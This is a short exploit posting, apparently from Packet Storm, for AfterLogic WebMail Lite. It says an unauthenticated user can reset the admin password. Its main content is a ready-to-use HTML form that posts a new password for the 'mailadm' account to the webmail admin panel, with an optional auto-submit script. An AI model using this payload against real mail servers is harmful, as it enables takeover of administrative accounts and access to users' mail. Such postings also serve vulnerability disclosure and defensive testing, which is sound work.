AfterLogic WebMail Lite allows for an unauthenticated user to set an administrative password.
bf60678dc4156a2c4163e6ba2c9b3dc300a0635313915e2001465b0a83a9262aAfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client
with Ajax interface. AfterLogic WebMail Lite is available for both PHP
and ASP.NET platforms.
The version of AfterLogic WebMail Lite that is written in PHP is free
and open-source software subject to the terms of the Affero General
Public License (AGPL) version 3. The version written in ASP.NET is
proprietary software available as freeware.
And is deployed over 5/20 mailsevers, quite popular.
This exploit attempts to exploit the admin and get(s) us a new
password to the admin panel which should be located at
site.com/mail/adminpanel/index.php
<h2>After Logic Mail - Change Admin Password Exploit</h2>
<form action="http://localhost/webmail/adminpanel/index.php?submit"
method="POST" id="security_form">
<input type="hidden" name="form_id" value="security">
<input type="text" class="wm_input" name="txtUserName"
id="txtUserName" value="mailadm" size="30" />
<input type="password" class="wm_input" name="txtNewPassword"
id="txtNewPassword" value="newpass" size="30" />
<input type="password" class="wm_input" name="txtConfirmNewPassword"
id="txtConfirmNewPassword" value="newpass" size="30" />
<input type="submit" name="submit_btn" value="Save" id="automate">
</form>
<script>
//uncomment the second line for automation
//document.getElementById('automate').click();
</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed